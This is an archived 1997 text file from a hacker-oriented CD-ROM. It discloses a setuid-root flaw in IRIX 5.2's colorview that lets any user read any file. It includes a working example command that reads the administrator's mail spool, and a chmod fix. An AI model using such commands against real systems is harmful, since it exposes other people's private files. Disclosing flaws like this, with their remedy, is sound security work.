home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / irix / irix-c~1.asc next >
Encoding:
Text File  |  1997-03-11  |  803 b   |  25 lines
  1.  
  2.  
  3.  
  4.  
  5. A vulnerability exists under IRIX 5.2 (std release) that allows any
  6.  
  7. user to read any file on the system.
  8.  
  9.  
  10.  
  11. % uname -a
  12.  
  13. IRIX bailer 5.2 02282016 IP22 mips
  14.  
  15.  
  16.  
  17. % ls -als /usr/sbin/colorview
  18.  
  19.  742 -rwsr-xr-x    1 root     sys       379680 Jun  7 10:36 /usr/sbin/colorview
  20.  
  21.  
  22.  
  23. An example (to view the admin's mail file):
  24.  
  25. % /usr/sbin/colorview -text /var/spool/mail/admin
  26.  
  27.  
  28.  
  29.  
  30.  
  31. To correct this:
  32.  
  33.  
  34.  
  35. # chmod u-s /usr/sbin/colorview
  36.  
  37. --
  38.  
  39. /-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
  40.  
  41. | Blackstar - jmartin@herky.cs.uiowa.edu                          |
  42.  
  43. | "Beware of the bugs in the above code; I have only proved it    |
  44.  
  45. |  correct, not tried it."  -- Donald Knuth                       |
  46.  
  47. \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
  48.  
  49.